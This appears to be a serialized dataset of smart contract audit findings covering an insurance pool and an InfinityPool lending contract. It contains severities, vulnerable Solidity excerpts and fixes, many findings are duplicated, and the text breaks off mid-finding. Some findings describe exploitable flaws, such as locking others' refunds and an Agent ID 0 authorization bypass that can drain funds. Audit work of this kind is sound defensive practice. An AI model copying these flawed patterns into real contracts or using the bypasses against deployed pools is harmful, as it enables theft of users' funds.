the README contains the following information:\\ncode/README.md:L11\\n```\\nEvery Pool is a standalone smart contract. It is made upgradeable with OpenZeppelin's Proxy Upgrade Pattern.\\n```\\n\\ncode/README.md:L56\\n```\\nAnd there will be multiple proxies and one implementation of the Pools, and one proxy and one implementation of EventAggregator.\\n```\\n\\nThere are several issues related to upgradeability or, generally, using the contracts as implementations for proxies. 
All recommendations in this report assume that it is not necessary to remain compatible with an existing deployment.\\nB. If upgradeability is supposed to work with inheritance, there should be dummy variables at the end of each contract in the inheritance hierarchy. Some of these have to be removed when “real” state variables are added. More precisely, it is conventional to use a fixed-size `uint256` array `__gap`, such that the consecutively occupied slots at the beginning (for the “real” state variables) add up to 50 with the size of the array. If state variables are added later, the gap's size has to be reduced accordingly to maintain this invariant. Currently, the contracts do not declare such a `__gap` variable.\\nC. Implementation contracts should not remain uninitalized. To prevent initialization by an attacker - which, in some cases, can have an impact on the proxy - the implementation contract's constructor should call `_disableInitializers`.чRefamiliarize yourself with the subtleties and pitfalls of upgradeable `contracts`, in particular regarding state variables and the storage gap. A lot of useful information can be found here.\\nOnly import from `contracts-upgradeable`, not from `contracts`.\\nAdd appropriately-sized storage gaps at least to `PoolModel`, `NonReentrancy`, and `EventAggregator`. (Note that adding a storage gap to `NonReentrancy` will break compatibility with existing deployments.) Ideally, add comments and warnings to each file that state variables may only be added at the end, that the storage gap's size has to be reduced accordingly, and that state variables must not be removed, rearranged, or in any way altered (e.g., type, `constant`, immutable). No state variables should ever be added to the `Pool` contract, and a comment should make that clear.\\nAdd a constructor to `Pool` and `EventAggregator` that calls `_disableInitializers`.чч```\\nEvery Pool is a standalone smart contract. 
It is made upgradeable with OpenZeppelin's Proxy Upgrade Pattern.\\n```\\n -initialize - Committee members array can contain duplicatesчmediumчThe initial committee members are given as array argument to the pool's `initialize` function. When the array is processed, there is no check for duplicates, and duplicates may also end up in the storage array `committeeArray`.\\n```\\nfor (uint256 i = 0; i < committeeMembers\\_.length; ++i) {\\n address member = committeeMembers\\_[i];\\n committeeArray.push(member);\\n committeeIndexPlusOne[member] = committeeArray.length;\\n}\\n```\\n\\nDuplicates will result in a discrepancy between the length of the array - which is later interpreted as the number of committee members - and the actual number of (different) committee members. This could lead to more problems, such as an insufficient committee size to reach the threshold.чThe `initialize` function should verify in the loop that `member` hasn't been added before. Note that `_executeAddToCommittee` refuses to add someone who is already in the committee, and the same technique can be employed here.чч```\\nfor (uint256 i = 0; i < committeeMembers\\_.length; ++i) {\\n address member = committeeMembers\\_[i];\\n committeeArray.push(member);\\n committeeIndexPlusOne[member] = committeeArray.length;\\n}\\n```\\n -Pool.buy- Users may end up paying more than intended due to changes in policy.weeklyPremiumчmediumчThe price that an insurance buyer has to pay for insurance is determined by the duration of the coverage and the `weeklyPremium`. The price increases as the `weeklyPremium` increases. 
If a `buy` transaction is waiting in the mempool but eventually front-run by another transaction that increases `weeklyPremium`, the user will end up paying more than they anticipated for the same insurance coverage (assuming their allowance to the `Pool` contract is unlimited or at least higher than what they expected to pay).\\n```\\nuint256 premium = amount\\_.mul(policy.weeklyPremium).div(RATIO\\_BASE);\\nuint256 allPremium = premium.mul(toWeek\\_.sub(fromWeek\\_));\\n```\\nчConsider adding a parameter for the maximum amount to pay, and make sure that the transaction will revert if `allPremium` is greater than this maximum value.чч```\\nuint256 premium = amount\\_.mul(policy.weeklyPremium).div(RATIO\\_BASE);\\nuint256 allPremium = premium.mul(toWeek\\_.sub(fromWeek\\_));\\n```\\n -Missing validation checks in executeчmediumчThe `Pool` contract implements a threshold voting mechanism for some changes in the contract state, where either the pool manager or a committee member can propose a change by calling `claim`, `changePoolManager`, `addToCommittee`, `removeFromCommittee`, or `changeCommitteeThreshold`, and then the committee has a time period for voting. If the threshold is reached during this period, then anyone can call `execute` to `execute` the state change.\\nWhile some validation checks are implemented in the proposal phase, this is not enough to ensure that business logic rules around these changes are completely enforced.\\n`_executeRemoveFromCommittee` - While the `removeFromCommittee` function makes sure that `committeeArray.length > committeeThreshold`, i.e., that there should always be enough committee members to reach the threshold, the same validation check is not enforced in `_executeRemoveFromCommittee`. 
To better illustrate the issue, let's consider the following example: `committeeArray.length = 5`, `committeeThreshold = 4`, and now `removeFromCommittee` is called two times in a row, where the second call is made before the first call reaches the threshold. In this case, both requests will be executed successfully, and we end up with `committeeArray.length = 3` and `committeeThreshold = 4`, which is clearly not desired.\\n`_executeChangeCommitteeThreshold` - Applying the same concept here, this function lacks the validation check of `threshold_ <= committeeArray.length`, leading to the same issue as above. Let's consider the following example: `committeeArray.length = 3`, `committeeThreshold = 2`, and now `changeCommitteeThreshold` is called with `threshold_ = 3`, but before this request is executed, `removeFromCommittee` is called. After both requests have been executed successfully, we will end up with `committeeThreshold = 3` and `committeeArray.length = 2`, which is clearly not desired.\\n```\\nfunction \\_executeRemoveFromCommittee(address who\\_) private {\\n```\\n\\n```\\nfunction \\_executeChangeCommitteeThreshold(uint256 threshold\\_) private {\\n```\\nчApply the same validation checks in the functions that execute the state change.чч```\\nfunction \\_executeRemoveFromCommittee(address who\\_) private {\\n```\\n -Hard-coded minimum deposit amountчlowчResolution\\nFixed in 3bbafab926df0ea39f444ef0fd5d2a6197f99a5d by implementing the auditor's recommendation.\\nThe `deposit` function specifies a minimum amount of 1e12 units of the base token for a deposit:\\n```\\nuint256 constant AMOUNT\\_PER\\_SHARE = 1e18;\\n```\\n\\n```\\n// Anyone can be a seller, and deposit baseToken (e.g. 
USDC or WETH)\\n// to the pool.\\nfunction deposit(\\n uint256 amount\\_\\n) external noReenter {\\n require(enabled, \"Not enabled\");\\n\\n require(amount\\_ >= AMOUNT\\_PER\\_SHARE / 1000000, \"Less than minimum\");\\n```\\n\\nWhether that's an appropriate minimum amount or not depends on the base token. Note that the two example tokens listed above are USDC and WETH. With current ETH prices, 1e12 Wei cost an affordable 0.2 US Cent. USDC, on the other hand, has 6 decimals, so 1e12 units are worth 1 million USD, which is … steep.чThe minimum deposit amount should be configurable.чч```\\nuint256 constant AMOUNT\\_PER\\_SHARE = 1e18;\\n```\\n -Outdated Solidity versionчlowчThe source files' version pragmas either specify that they need compiler version exactly 0.8.10 or at least 0.8.10:\\n```\\npragma solidity 0.8.10;\\n```\\n\\n```\\npragma solidity ^0.8.10;\\n```\\n\\nSolidity v0.8.10 is a fairly dated version that has known security issues. We generally recommend using the latest version of the compiler (at the time of writing, this is v0.8.20), and we also discourage the use of floating pragmas to make sure that the source files are actually compiled and deployed with the same compiler version they have been tested with.чResolution\\nFixed in 3bbafab926df0ea39f444ef0fd5d2a6197f99a5d by implementing the auditor's recommendation.\\nUse the Solidity compiler v0.8.20, and change the version pragma in all Solidity source files to `pragma solidity 0.8.20;`.чч```\\npragma solidity 0.8.10;\\n```\\n -Code used for testing purposes should be removed before deploymentчlowчVariables and logic have been added to the code whose only purpose is to make it easier to test. This might cause unexpected behavior if deployed in production. 
For instance, `onlyTest` and `setTimeExtra` should be removed from the code before deployment, as well as `timeExtra` in `getCurrentWeek` and `getNow`.\\n```\\nmodifier onlyTest() {\\n```\\n\\n```\\nfunction setTimeExtra(uint256 timeExtra\\_) external onlyTest {\\n```\\n\\n```\\nfunction getCurrentWeek() public view returns(uint256) {\\n return (block.timestamp + TIME\\_OFFSET + timeExtra) / (7 days);\\n}\\n```\\n\\n```\\nfunction getNow() public view returns(uint256) {\\n return block.timestamp + timeExtra;\\n}\\n```\\nчFor the long term, consider mimicking this behavior by using features offered by your testing framework.чч```\\nmodifier onlyTest() {\\n```\\n -Missing eventsчlowчSome state-changing functions do not emit an event at all or omit relevant information.\\nA. `Pool.setEventAggregator` should emit an event with the value of `eventAggregator_` so that off-chain services will be notified and can automatically adjust.\\n```\\nfunction setEventAggregator(address eventAggregator\\_) external onlyPoolManager {\\n eventAggregator = eventAggregator\\_;\\n}\\n```\\n\\nB. `Pool.enablePool` should emit an event when the pool is dis- or enabled.\\n```\\nfunction enablePool(bool enabled\\_) external onlyPoolManager {\\n enabled = enabled\\_;\\n}\\n```\\n\\nC. 
`Pool.execute` only logs the `requestIndex_` while it should also include the `operation` and `data` to better reflect the state change in the transaction.\\n```\\nif (eventAggregator != address(0)) {\\n IEventAggregator(eventAggregator).execute(\\n requestIndex\\_\\n );\\n}\\n```\\nчState-changing functions should emit an event to have an audit trail and enable monitoring of smart contract usage.чч```\\nfunction setEventAggregator(address eventAggregator\\_) external onlyPoolManager {\\n eventAggregator = eventAggregator\\_;\\n}\\n```\\n -addPremium - A Back Runner May Cause an Insurance Holder to Lose Their Refunds by Calling addPremium Right After the Original Callчhighч`addPremium` is a public function that can be called by anyone and that distributes the weekly premium payments to the pool manager and the rest of the pool share holders. If the collateral deposited is not enough to cover the total coverage offered to insurance holders for a given week, refunds are allocated pro rata for all insurance holders of that particular week and policy. However, in the current implementation, attackers can call `addPremium` right after the original call to `addPremium` but before the call to refund; this will cause the insurance holders to lose their refunds, which will be effectively locked forever in the contract (unless the contract is upgraded).\\n```\\nrefundMap[policyIndex\\_][week] = incomeMap[policyIndex\\_][week].mul(\\n allCovered.sub(maximumToCover)).div(allCovered);\\n```\\nч`addPremium` should contain a validation check in the beginning of the function that reverts for the case of `incomeMap[policyIndex_][week] = 0`.чч```\\nrefundMap[policyIndex\\_][week] = incomeMap[policyIndex\\_][week].mul(\\n allCovered.sub(maximumToCover)).div(allCovered);\\n```\\n -refund - Attacker Can Lock Insurance Holder's Refunds by Calling refund Before a Refund Was Allocatedчhighч`addPremium` is used to determine the `refund` amount that an insurance holder is eligible to claim. 
The amount is stored in the `refundMap` mapping and can then later be claimed by anyone on behalf of an insurance holder by calling `refund`. The `refund` function can't be called more than once for a given combination of `policyIndex_`, `week_`, and `who_`, as it would revert with an “Already refunded” error. This gives an attacker the opportunity to call `refund` on behalf of any insurance holder with value 0 inside the `refundMap`, causing any future `refund` allocated for that holder in a given week and for a given policy to be locked forever in the contract (unless the contract is upgraded).\\n```\\nfunction refund(\\n uint256 policyIndex\\_,\\n uint256 week\\_,\\n address who\\_\\n) external noReenter {\\n Coverage storage coverage = coverageMap[policyIndex\\_][week\\_][who\\_];\\n\\n require(!coverage.refunded, \"Already refunded\");\\n\\n uint256 allCovered = coveredMap[policyIndex\\_][week\\_];\\n uint256 amountToRefund = refundMap[policyIndex\\_][week\\_].mul(\\n coverage.amount).div(allCovered);\\n coverage.amount = coverage.amount.mul(\\n coverage.premium.sub(amountToRefund)).div(coverage.premium);\\n coverage.refunded = true;\\n\\n IERC20(baseToken).safeTransfer(who\\_, amountToRefund);\\n\\n if (eventAggregator != address(0)) {\\n IEventAggregator(eventAggregator).refund(\\n policyIndex\\_,\\n week\\_,\\n who\\_,\\n amountToRefund\\n );\\n }\\n}\\n```\\nчThere should be a validation check at the beginning of the function that reverts if `refundMap[policyIndex_][week_] == 0`.чч```\\nfunction refund(\\n uint256 policyIndex\\_,\\n uint256 week\\_,\\n address who\\_\\n) external noReenter {\\n Coverage storage coverage = coverageMap[policyIndex\\_][week\\_][who\\_];\\n\\n require(!coverage.refunded, \"Already refunded\");\\n\\n uint256 allCovered = coveredMap[policyIndex\\_][week\\_];\\n uint256 amountToRefund = refundMap[policyIndex\\_][week\\_].mul(\\n coverage.amount).div(allCovered);\\n coverage.amount = coverage.amount.mul(\\n 
coverage.premium.sub(amountToRefund)).div(coverage.premium);\\n coverage.refunded = true;\\n\\n IERC20(baseToken).safeTransfer(who\\_, amountToRefund);\\n\\n if (eventAggregator != address(0)) {\\n IEventAggregator(eventAggregator).refund(\\n policyIndex\\_,\\n week\\_,\\n who\\_,\\n amountToRefund\\n );\\n }\\n}\\n```\\n -addTidal, _updateUserTidal, withdrawTidal - Wrong Arithmetic CalculationsчhighчTo further incentivize sellers, anyone - although it will usually be the pool manager - can send an arbitrary amount of the Tidal token to a pool, which is then supposed to be distributed proportionally among the share owners. There are several flaws in the calculations that implement this mechanism:\\nA. addTidal:\\n```\\npoolInfo.accTidalPerShare = poolInfo.accTidalPerShare.add(\\n amount\\_.mul(SHARE\\_UNITS)).div(poolInfo.totalShare);\\n```\\n\\nThis should be:\\n```\\npoolInfo.accTidalPerShare = poolInfo.accTidalPerShare.add(\\n amount\\_.mul(SHARE\\_UNITS).div(poolInfo.totalShare));\\n```\\n\\nNote the different parenthesization. Without SafeMath:\\n```\\npoolInfo.accTidalPerShare += amount\\_ \\* SHARE\\_UNITS / poolInfo.totalShare;\\n```\\n\\nB. _updateUserTidal:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare.add(\\n userInfo.share).div(SHARE\\_UNITS);\\n```\\n\\nThis should be:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare.mul(\\n userInfo.share).div(SHARE\\_UNITS);\\n```\\n\\nNote that `add` has been replaced with `mul`. Without SafeMath:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare \\* userInfo.share / SHARE\\_UNITS;\\n```\\n\\nC. withdrawTidal:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare.add(userInfo.share);\\n```\\n\\nAs in B, this should be:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare.mul(\\n userInfo.share).div(SHARE\\_UNITS);\\n```\\n\\nNote that `add` has been replaced with `mul` and that a division by `SHARE_UNITS` has been appended. 
Without SafeMath:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare \\* userInfo.share / SHARE\\_UNITS;\\n```\\n\\nAs an additional minor point, the division in `addTidal` will revert with a panic (0x12) if the number of shares in the pool is zero. This case could be handled more gracefully.чImplement the fixes described above. The versions without `SafeMath` are easier to read and should be preferred; see issue 3.13.чч```\\npoolInfo.accTidalPerShare = poolInfo.accTidalPerShare.add(\\n amount\\_.mul(SHARE\\_UNITS)).div(poolInfo.totalShare);\\n```\\n -claim - Incomplete and Lenient ImplementationчhighчIn the current version of the code, the `claim` function is lacking crucial input validation logic as well as required state changes. Most of the process is implemented in other contracts or off-chain at the moment and is therefore out of scope for this audit, but there might still be issues caused by potential errors in the process. Moreover, pool manager and committee together have unlimited ownership of the deposits and can essentially withdraw all collateral to any desired address.\\n```\\nfunction claim(\\n uint256 policyIndex\\_,\\n uint256 amount\\_,\\n address receipient\\_\\n) external onlyPoolManager {\\n```\\nчTo ensure a more secure claiming process, we propose adding the following logic to the `claim` function:\\n`refund` should be called at the beginning of the `claim` flow, so that the recipient's true coverage amount will be used.\\n`policyIndex` should be added as a parameter to this function, so that `coverageMap` can be used to validate that the amount claimed on behalf of a recipient is covered.\\nThe payout amount should be subtracted in the `coveredMap` and `coverageMap` mappings.чч```\\nfunction claim(\\n uint256 policyIndex\\_,\\n uint256 amount\\_,\\n address receipient\\_\\n) external onlyPoolManager {\\n```\\n -buy - Insurance Buyers Trying to Increase Their Coverage Amount Will Lose Their Previous CoverageчhighчWhen a user is willing to 
`buy` insurance, he is required to specify the desired amount (denoted as amount_) and to pay the entire premium upfront. In return, he receives the ownership over an entry inside the `coverageMap` mapping. If a user calls the `buy` function more than once for the same policy and time frame, his entry in the `coverageMap` will not represent the accumulated amount that he paid for but only the last coverage amount, which means previous coverage will be lost forever (unless the contract is upgraded).\\n```\\nfor (uint256 w = fromWeek\\_; w < toWeek\\_; ++w) {\\n incomeMap[policyIndex\\_][w] =\\n incomeMap[policyIndex\\_][w].add(premium);\\n coveredMap[policyIndex\\_][w] =\\n coveredMap[policyIndex\\_][w].add(amount\\_);\\n\\n require(coveredMap[policyIndex\\_][w] <= maximumToCover,\\n \"Not enough to buy\");\\n\\n coverageMap[policyIndex\\_][w][\\_msgSender()] = Coverage({\\n amount: amount\\_,\\n premium: premium,\\n refunded: false\\n });\\n}\\n```\\nчThe coverage entry that represents the user's coverage should not be overwritten but should hold the accumulated amount of coverage instead.чч```\\nfor (uint256 w = fromWeek\\_; w < toWeek\\_; ++w) {\\n incomeMap[policyIndex\\_][w] =\\n incomeMap[policyIndex\\_][w].add(premium);\\n coveredMap[policyIndex\\_][w] =\\n coveredMap[policyIndex\\_][w].add(amount\\_);\\n\\n require(coveredMap[policyIndex\\_][w] <= maximumToCover,\\n \"Not enough to buy\");\\n\\n coverageMap[policyIndex\\_][w][\\_msgSender()] = Coverage({\\n amount: amount\\_,\\n premium: premium,\\n refunded: false\\n });\\n}\\n```\\n -Several Issues Related to Upgradeability of ContractsчmediumчWe did not find a proxy contract or factory in the repository, but the README contains the following information:\\nREADME.md:L11\\n```\\nEvery Pool is a standalone smart contract. 
It is made upgradeable with OpenZeppelin's Proxy Upgrade Pattern.\\n```\\n\\nREADME.md:L56\\n```\\nAnd there will be multiple proxies and one implementation of the Pools, and one proxy and one implementation of EventAggregator.\\n```\\n\\nThere are several issues related to upgradeability or, generally, using the contracts as implementations for proxies. All recommendations in this report assume that it is not necessary to remain compatible with an existing deployment.\\nB. If upgradeability is supposed to work with inheritance, there should be dummy variables at the end of each contract in the inheritance hierarchy. Some of these have to be removed when “real” state variables are added. More precisely, it is conventional to use a fixed-size `uint256` array `__gap`, such that the consecutively occupied slots at the beginning (for the “real” state variables) add up to 50 with the size of the array. If state variables are added later, the gap's size has to be reduced accordingly to maintain this invariant. Currently, the contracts do not declare such a `__gap` variable.\\nC. Implementation contracts should not remain uninitialized. To prevent initialization by an attacker - which, in some cases, can have an impact on the proxy - the implementation contract's constructor should call `_disableInitializers`.чRefamiliarize yourself with the subtleties and pitfalls of upgradeable `contracts`, in particular regarding state variables and the storage gap. A lot of useful information can be found here.\\nOnly import from `contracts-upgradeable`, not from `contracts`.\\nAdd appropriately-sized storage gaps at least to `PoolModel`, `NonReentrancy`, and `EventAggregator`. (Note that adding a storage gap to `NonReentrancy` will break compatibility with existing deployments.) 
Ideally, add comments and warnings to each file that state variables may only be added at the end, that the storage gap's size has to be reduced accordingly, and that state variables must not be removed, rearranged, or in any way altered (e.g., type, `constant`, immutable). No state variables should ever be added to the `Pool` contract, and a comment should make that clear.\\nAdd a constructor to `Pool` and `EventAggregator` that calls `_disableInitializers`.чч```\\nEvery Pool is a standalone smart contract. It is made upgradeable with OpenZeppelin's Proxy Upgrade Pattern.\\n```\\n -initialize - Committee Members Array Can Contain DuplicatesчmediumчThe initial committee members are given as array argument to the pool's `initialize` function. When the array is processed, there is no check for duplicates, and duplicates may also end up in the storage array `committeeArray`.\\n```\\nfor (uint256 i = 0; i < committeeMembers\\_.length; ++i) {\\n address member = committeeMembers\\_[i];\\n committeeArray.push(member);\\n committeeIndexPlusOne[member] = committeeArray.length;\\n}\\n```\\n\\nDuplicates will result in a discrepancy between the length of the array - which is later interpreted as the number of committee members - and the actual number of (different) committee members. This could lead to more problems, such as an insufficient committee size to reach the threshold.чThe `initialize` function should verify in the loop that `member` hasn't been added before. 
Note that `_executeAddToCommittee` refuses to add someone who is already in the committee, and the same technique can be employed here.чч```\\nfor (uint256 i = 0; i < committeeMembers\\_.length; ++i) {\\n address member = committeeMembers\\_[i];\\n committeeArray.push(member);\\n committeeIndexPlusOne[member] = committeeArray.length;\\n}\\n```\\n -Pool.buy- Users May End Up Paying More Than Intended Due to Changes in policy.weeklyPremiumчmediumчThe price that an insurance buyer has to pay for insurance is determined by the duration of the coverage and the `weeklyPremium`. The price increases as the `weeklyPremium` increases. If a `buy` transaction is waiting in the mempool but eventually front-run by another transaction that increases `weeklyPremium`, the user will end up paying more than they anticipated for the same insurance coverage (assuming their allowance to the `Pool` contract is unlimited or at least higher than what they expected to pay).\\n```\\nuint256 premium = amount\\_.mul(policy.weeklyPremium).div(RATIO\\_BASE);\\nuint256 allPremium = premium.mul(toWeek\\_.sub(fromWeek\\_));\\n```\\nчConsider adding a parameter for the maximum amount to pay, and make sure that the transaction will revert if `allPremium` is greater than this maximum value.чч```\\nuint256 premium = amount\\_.mul(policy.weeklyPremium).div(RATIO\\_BASE);\\nuint256 allPremium = premium.mul(toWeek\\_.sub(fromWeek\\_));\\n```\\n -Missing Validation Checks in executeчmediumчThe `Pool` contract implements a threshold voting mechanism for some changes in the contract state, where either the pool manager or a committee member can propose a change by calling `claim`, `changePoolManager`, `addToCommittee`, `removeFromCommittee`, or `changeCommitteeThreshold`, and then the committee has a time period for voting. 
If the threshold is reached during this period, then anyone can call `execute` to `execute` the state change.\\nWhile some validation checks are implemented in the proposal phase, this is not enough to ensure that business logic rules around these changes are completely enforced.\\n`_executeRemoveFromCommittee` - While the `removeFromCommittee` function makes sure that `committeeArray.length > committeeThreshold`, i.e., that there should always be enough committee members to reach the threshold, the same validation check is not enforced in `_executeRemoveFromCommittee`. To better illustrate the issue, let's consider the following example: `committeeArray.length = 5`, `committeeThreshold = 4`, and now `removeFromCommittee` is called two times in a row, where the second call is made before the first call reaches the threshold. In this case, both requests will be executed successfully, and we end up with `committeeArray.length = 3` and `committeeThreshold = 4`, which is clearly not desired.\\n`_executeChangeCommitteeThreshold` - Applying the same concept here, this function lacks the validation check of `threshold_ <= committeeArray.length`, leading to the same issue as above. Let's consider the following example: `committeeArray.length = 3`, `committeeThreshold = 2`, and now `changeCommitteeThreshold` is called with `threshold_ = 3`, but before this request is executed, `removeFromCommittee` is called. 
After both requests have been executed successfully, we will end up with `committeeThreshold = 3` and `committeeArray.length = 2`, which is clearly not desired.\\n```\\nfunction \\_executeRemoveFromCommittee(address who\\_) private {\\n```\\n\\n```\\nfunction \\_executeChangeCommitteeThreshold(uint256 threshold\\_) private {\\n```\\nчApply the same validation checks in the functions that execute the state change.чч```\\nfunction \\_executeRemoveFromCommittee(address who\\_) private {\\n```\\n -Hard-Coded Minimum Deposit AmountчlowчResolution\\nFixed in 3bbafab926df0ea39f444ef0fd5d2a6197f99a5d by implementing the auditor's recommendation.\\nThe `deposit` function specifies a minimum amount of 1e12 units of the base token for a deposit:\\n```\\nuint256 constant AMOUNT\\_PER\\_SHARE = 1e18;\\n```\\n\\n```\\n// Anyone can be a seller, and deposit baseToken (e.g. USDC or WETH)\\n// to the pool.\\nfunction deposit(\\n uint256 amount\\_\\n) external noReenter {\\n require(enabled, \"Not enabled\");\\n\\n require(amount\\_ >= AMOUNT\\_PER\\_SHARE / 1000000, \"Less than minimum\");\\n```\\n\\nWhether that's an appropriate minimum amount or not depends on the base token. Note that the two example tokens listed above are USDC and WETH. With current ETH prices, 1e12 Wei cost an affordable 0.2 US Cent. USDC, on the other hand, has 6 decimals, so 1e12 units are worth 1 million USD, which is … steep.чThe minimum deposit amount should be configurable.чч```\\nuint256 constant AMOUNT\\_PER\\_SHARE = 1e18;\\n```\\n -Outdated Solidity VersionчlowчThe source files' version pragmas either specify that they need compiler version exactly 0.8.10 or at least 0.8.10:\\n```\\npragma solidity 0.8.10;\\n```\\n\\n```\\npragma solidity ^0.8.10;\\n```\\n\\nSolidity v0.8.10 is a fairly dated version that has known security issues. 
We generally recommend using the latest version of the compiler (at the time of writing, this is v0.8.20), and we also discourage the use of floating pragmas to make sure that the source files are actually compiled and deployed with the same compiler version they have been tested with.чResolution\\nFixed in 3bbafab926df0ea39f444ef0fd5d2a6197f99a5d by implementing the auditor's recommendation.\\nUse the Solidity compiler v0.8.20, and change the version pragma in all Solidity source files to `pragma solidity 0.8.20;`.чч```\\npragma solidity 0.8.10;\\n```\\n -Code Used for Testing Purposes Should Be Removed Before DeploymentчlowчVariables and logic have been added to the code whose only purpose is to make it easier to test. This might cause unexpected behavior if deployed in production. For instance, `onlyTest` and `setTimeExtra` should be removed from the code before deployment, as well as `timeExtra` in `getCurrentWeek` and `getNow`.\\n```\\nmodifier onlyTest() {\\n```\\n\\n```\\nfunction setTimeExtra(uint256 timeExtra\\_) external onlyTest {\\n```\\n\\n```\\nfunction getCurrentWeek() public view returns(uint256) {\\n return (block.timestamp + TIME\\_OFFSET + timeExtra) / (7 days);\\n}\\n```\\n\\n```\\nfunction getNow() public view returns(uint256) {\\n return block.timestamp + timeExtra;\\n}\\n```\\nчFor the long term, consider mimicking this behavior by using features offered by your testing framework.чч```\\nmodifier onlyTest() {\\n```\\n -Missing EventsчlowчSome state-changing functions do not emit an event at all or omit relevant information.\\nA. `Pool.setEventAggregator` should emit an event with the value of `eventAggregator_` so that off-chain services will be notified and can automatically adjust.\\n```\\nfunction setEventAggregator(address eventAggregator\\_) external onlyPoolManager {\\n eventAggregator = eventAggregator\\_;\\n}\\n```\\n\\nB. 
`Pool.enablePool` should emit an event when the pool is dis- or enabled.\\n```\\nfunction enablePool(bool enabled\\_) external onlyPoolManager {\\n enabled = enabled\\_;\\n}\\n```\\n\\nC. `Pool.execute` only logs the `requestIndex_` while it should also include the `operation` and `data` to better reflect the state change in the transaction.\\n```\\nif (eventAggregator != address(0)) {\\n IEventAggregator(eventAggregator).execute(\\n requestIndex\\_\\n );\\n}\\n```\\nчState-changing functions should emit an event to have an audit trail and enable monitoring of smart contract usage.чч```\\nfunction setEventAggregator(address eventAggregator\\_) external onlyPoolManager {\\n eventAggregator = eventAggregator\\_;\\n}\\n```\\n -InfinityPool contract authorization bypass attackчhighчAn attacker could create their own credential and set the `Agent` ID to `0`, which would bypass the `subjectIsAgentCaller` modifier. The attacker could use this attack to `borrow` funds from the pool, draining any available liquidity. 
For example, only an `Agent` should be able to `borrow` funds from the pool and call the `borrow` function:\\n```\\nfunction borrow(VerifiableCredential memory vc) external isOpen subjectIsAgentCaller(vc) {\\n // 1e18 => 1 FIL, can't borrow less than 1 FIL\\n if (vc.value < WAD) revert InvalidParams();\\n // can't borrow more than the pool has\\n if (totalBorrowableAssets() < vc.value) revert InsufficientLiquidity();\\n Account memory account = \\_getAccount(vc.subject);\\n // fresh account, set start epoch and epochsPaid to beginning of current window\\n if (account.principal == 0) {\\n uint256 currentEpoch = block.number;\\n account.startEpoch = currentEpoch;\\n account.epochsPaid = currentEpoch;\\n GetRoute.agentPolice(router).addPoolToList(vc.subject, id);\\n }\\n\\n account.principal += vc.value;\\n account.save(router, vc.subject, id);\\n\\n totalBorrowed += vc.value;\\n\\n emit Borrow(vc.subject, vc.value);\\n\\n // interact - here `msg.sender` must be the Agent bc of the `subjectIsAgentCaller` modifier\\n asset.transfer(msg.sender, vc.value);\\n}\\n```\\n\\nThe following modifier checks that the caller is an Agent:\\n```\\nmodifier subjectIsAgentCaller(VerifiableCredential memory vc) {\\n if (\\n GetRoute.agentFactory(router).agents(msg.sender) != vc.subject\\n ) revert Unauthorized();\\n \\_;\\n}\\n```\\n\\nBut if the caller is not an `Agent`, the `GetRoute.agentFactory(router).agents(msg.sender)` will return `0`. And if the `vc.subject` is also zero, the check will be successful with any `msg.sender`. 
The attacker can also pass an arbitrary `vc.value` as the parameter and steal all the funds from the pool.чEnsure only an `Agent` can call `borrow` and pass the `subjectIsAgentCaller` modifier.чч```\\nfunction borrow(VerifiableCredential memory vc) external isOpen subjectIsAgentCaller(vc) {\\n // 1e18 => 1 FIL, can't borrow less than 1 FIL\\n if (vc.value < WAD) revert InvalidParams();\\n // can't borrow more than the pool has\\n if (totalBorrowableAssets() < vc.value) revert InsufficientLiquidity();\\n Account memory account = \\_getAccount(vc.subject);\\n // fresh account, set start epoch and epochsPaid to beginning of current window\\n if (account.principal == 0) {\\n uint256 currentEpoch = block.number;\\n account.startEpoch = currentEpoch;\\n account.epochsPaid = currentEpoch;\\n GetRoute.agentPolice(router).addPoolToList(vc.subject, id);\\n }\\n\\n account.principal += vc.value;\\n account.save(router, vc.subject, id);\\n\\n totalBorrowed += vc.value;\\n\\n emit Borrow(vc.subject, vc.value);\\n\\n // interact - here `msg.sender` must be the Agent bc of the `subjectIsAgentCaller` modifier\\n asset.transfer(msg.sender, vc.value);\\n}\\n```\\n -Wrong accounting for totalBorrowed in the InfinityPool.writeOff functionчhighчHere is a part of the `InfinityPool.writeOff` function:\\n```\\n// transfer the assets into the pool\\n// whatever we couldn't pay back\\nuint256 lostAmt = principalOwed > recoveredFunds ? principalOwed - recoveredFunds : 0;\\n\\nuint256 totalOwed = interestPaid + principalOwed;\\n\\nasset.transferFrom(\\n msg.sender,\\n address(this),\\n totalOwed > recoveredFunds ? recoveredFunds : totalOwed\\n);\\n// write off only what we lost\\ntotalBorrowed -= lostAmt;\\n// set the account with the funds the pool lost\\naccount.principal = lostAmt;\\n\\naccount.save(router, agentID, id);\\n```\\n\\nThe `totalBorrowed` is decreased by the `lostAmt` value. 
Instead, it should be decreased by the original `account.principal` value to acknowledge the loss.чResolution\\nFixed.чч```\\n// transfer the assets into the pool\\n// whatever we couldn't pay back\\nuint256 lostAmt = principalOwed > recoveredFunds ? principalOwed - recoveredFunds : 0;\\n\\nuint256 totalOwed = interestPaid + principalOwed;\\n\\nasset.transferFrom(\\n msg.sender,\\n address(this),\\n totalOwed > recoveredFunds ? recoveredFunds : totalOwed\\n);\\n// write off only what we lost\\ntotalBorrowed -= lostAmt;\\n// set the account with the funds the pool lost\\naccount.principal = lostAmt;\\n\\naccount.save(router, agentID, id);\\n```\\n -The beneficiaryWithdrawable function can be called by anyoneчhighчThe `beneficiaryWithdrawable` function is supposed to be called by the Agent when a beneficiary is trying to withdraw funds:\\n```\\nfunction beneficiaryWithdrawable(\\n address recipient,\\n address sender,\\n uint256 agentID,\\n uint256 proposedAmount\\n) external returns (\\n uint256 amount\\n) {\\n AgentBeneficiary memory beneficiary = \\_agentBeneficiaries[agentID];\\n address benneficiaryAddress = beneficiary.active.beneficiary;\\n // If the sender is not the owner of the Agent or the beneficiary, revert\\n if(\\n !(benneficiaryAddress == sender || (IAuth(msg.sender).owner() == sender && recipient == benneficiaryAddress) )) {\\n revert Unauthorized();\\n }\\n (\\n beneficiary,\\n amount\\n ) = beneficiary.withdraw(proposedAmount);\\n // update the beneficiary in storage\\n \\_agentBeneficiaries[agentID] = beneficiary;\\n}\\n```\\n\\nThis function reduces the quota that is supposed to be transferred during the `withdraw` call:\\n```\\n sendAmount = agentPolice.beneficiaryWithdrawable(receiver, msg.sender, id, 